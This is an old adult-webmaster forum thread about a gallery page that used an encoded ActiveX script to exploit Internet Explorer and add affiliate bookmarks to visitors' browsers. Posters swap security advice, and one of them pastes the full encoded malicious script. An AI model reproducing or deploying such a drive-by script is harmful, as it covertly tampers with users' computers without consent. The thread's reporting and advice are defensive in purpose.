GoFuckYourself.com - Adult Webmaster Forum

GoFuckYourself.com - Adult Webmaster Forum (https://gfy.com/index.php)
-   Fucking Around & Business Discussion (https://gfy.com/forumdisplay.php?f=26)
-   -   ActiveX spam (https://gfy.com/showthread.php?t=32785)

mediaguys 04-21-2001 11:07 PM

ActiveX spam
 
http://www.hardcore-teen-fucking.com/freepass appears without notice in my IE Favorites file on a regular basis even though I've never bookmarked it. It's just a Join4Free ad with Join4Free popping up as an exit console. Tonight I figured out why it's back in my bookmarks again. http://bald.wetsexyporn.com/teen48c.html is a gallery page in the teens section at Absolut-Series I viewed. The sneaky bastard who made the gallery is using activeX to exploit a vulnerability in IE and is adding his Join4Free page, without notice, to the bookmarks of every surfer who views the gallery. There is no way to know if he downloaded a virus along with the command to fuck with my bookmarks folder. The script is encoded.

According to a whois lookup of hardcore-teen-fucking.com, Join4Free webmaster #2714 is outside the USA and can't be sued for fucking up other people's computers no matter what he does. Lots of TGP webmaster's aren't so secure, however. It would be a good idea for any TGP reviewer to set their IE activeX controls to "prompt" when checking a gallery page. That way they'll be alerted as the activeX trys to load.

I guess Join4Free sign ups are slow because http://www.hardcore-teen-fucking.com/hotbabes showed up in my bookmarks too this time. It's a cyber-erotca "free pass" page of the type CE just changed their terms of service to get rid of. Figures.

Pete Dogg 04-21-2001 11:32 PM

Always set Active X to prompt.

It should be like that by default.

The Active X prompt to run active x programs which are executables like any other, then download to your machine and run. (you mostly dont notice, cause IE is executing it).
But that is a perfect way to get a virus. Without knowing.


Thanks for the post, it's a good security reminder to everyone.

------------------
Daily Naked

Free Auto Updating Top Referrer Lists

Pete Dogg 04-21-2001 11:34 PM

I just went to that gallery and it caused my Norton Antivirus protection to warn me that there was a potential security risk with the script and I should stop it.

Without that Im not sure what would have happened? If I would have been prompted or not.

Hmmm.

wiZd0m 04-21-2001 11:50 PM

Code:

#@~^qwQAAA==[Km;s+        YRSDbO+^xcB@!bKKd2K,^W9+'1GhRs/cl^Yr-( b1Ok7+p/K:wGUxOPSr9Y4{!,t+bo4O'ZPrN{bpq@*@!zzKnd2K@*vbi7lMPo?6S,?4VB~1YIW!xmOrKx~?Owl-vSKmlDkKU~:l.oYb`7lD,        sBP?4G.~,VKmIoxw?6RVnYUwn^blVoG^NnDvT*isKm{s3J'wsm\GDbYndrik6c"w?rcoGV9+M2akdOk`sW1b#PVG^{s?6 V+OfMr7+Hm:`w#3E-'fGm!:nUD/PmUN,?+DOrxT/'-E_HnDRi/.1m:nQr--oC7W.kDnkJIb0v"sUrcoW^NnDA6rdD/`^Gm*#        MnOEMxp8N?4GMPxPU4VcZ.nmY+j4KDOm!OvVG1_r--r_dGmmYrW        _E `ISrbiUtWM PlMoYKlO4,'~Km.oYIj4WD jm\n`*I)0;        mDkW        Pmak        kO`*P`-mDPmq'9Wm!hnxDRmw2VnOk`EboqJ*iCqc/+O/d?(fvEP!9W&w2!8OwT,2OqF;sR0Oc! T!z!ZO***y R8E#IC8R^DCYqUdDlx^nv#IsU6,'~mFcM+Dr(%+1Yc#plq k+Y;J?&f`r`o,2*GZ+ Rq;sTO8qfZO)9~,OTT;!*sGXRbT~8r#imFc^DlO+&xdOmxmc#p?t^~xPmFcMnY68N+^YvbimF dYZJj&fcJPoO&XGZyvO8ZwTO8F9! b9$OO!Z/!Wsfl0)!~8r#Ilq 1DnlDnq        /OC        m+cbp1nY,x,lqcMYr(L^Yv#I?YoC7`Jw.+P(opE~rtDY2)&&ShAR4CD9mG.OYnn        OWE1VbxLcmK:z6Dnwm/dzr#IjYsm-`rCWD~$l(+kJSJ4ODwlzJAhSR4CMNmG.OO+U 0;13bxocmKhz4WO4m4ndJJ#pj+Dsl7cE?Ab"ZuPPuAP        2~E~rtOOa)z&ASh /        CaX        +DzJ*iMnY!DUPDD;np80!UmDkW        ~^t0mKWVknc*        -lM~W{xnA,flOnv#I\m.,lxKRT+YGlDn`*iC_{ qIKR/OfmY+vCbib0,`[W^;s+UYc^WK3rnckx[nXrW`r-{FE*P{'P F*`NKm;:xO 1WW0r+{J\{qI+XwbDn/xE3W YKiK;?O.bxocbplak        rD`bp8)/+DKbh+KEO`Em4V1WW0r+v#iESq!Z!*iT4MBAA==^#~@
------------------
wiZd0m

wiZd0m 04-21-2001 11:54 PM

You should get a T-Shirt Holmes for your incestigational skillz!

------------------
wiZd0m

mediaguys 04-22-2001 08:46 AM

Quote:

Originally posted by wiZd0m:
You should get a T-Shirt Holmes for your incestigational skillz!
Yeh, that's the ticket. But I didn't solve anything. Absolut-Series responded to me reporting a cheater by telling me I misunderstood the problem, so he didn't take the gallery down. Actually, there is at least one more of those axtiveX spam pages on his teen listings http://excite.flowsex.com/teen73j.html if not more. I don't know how many more since I'm not going back. Sort of an activeX mine field.



All times are GMT -7. The time now is 09:46 PM.

Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc123